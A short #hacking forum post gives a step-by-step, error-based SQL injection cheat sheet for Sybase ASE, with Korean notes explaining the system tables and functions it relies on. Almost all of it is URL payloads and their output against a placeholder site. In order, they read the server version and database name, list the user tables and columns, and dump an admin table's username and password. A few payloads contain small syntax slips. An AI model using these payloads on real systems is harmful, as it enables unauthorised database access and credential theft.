Sybase SQL injection

in #hacking7 years ago

DBMS version

http://test.com/index.php?idx=1 or 1=convert(numeric,(select @@@version))#
=> Adaptive Server Enterprise/12.5.3/EBF 13325

current_db

http://test.com/index.php?idx=1 or 1=convert(numeric,(select db_name()))# // current_db
=> testdb

Tables of current_db

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,id)) from testdb..sysobjects where type=0x55))#
=> members:123456

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,id)) from testdb..sysobjects where type=0x55 and id not in(123456)))#
=> temp:24680

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,id)) from testdb..sysobjects where type=0x55 and id not in(123456,24680)))#
=> admin_member:74653

Columns of selected table(admin_member)

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,colid)) from testdb..syscolumns where id=74653)))#
=> name:10

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,colid)) from testdb..syscolumns where id=74653 and colid not in(10))))#
=> id:1

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||convert(char,colid)) from testdb..syscolumns where id=74653 and colid not in(10,1)))#
=> passwd:2

Data of select table(admin_member)

http://test.com/index.php?idx=1 or 1=convert(numeric,(select min(name||0x3a||id||0x3a||passwd) from admin_member))#
=> admin:1234

max(): 내림차순
min(): 오름차순
convert(데이터타입,value): value를 지정한 데이터 타입으로 변경
sysobjects: One row for each table, view, procedure, rule, trigger default, log, and (in tempdb only)
temporary object
syscolumns: One row for each column in a table or view, and for each parameter in a procedure
type 0x55 = 'U': 사용자가 생성한 테이블
not in(데이터): 데이터에 포함 된 것은 제외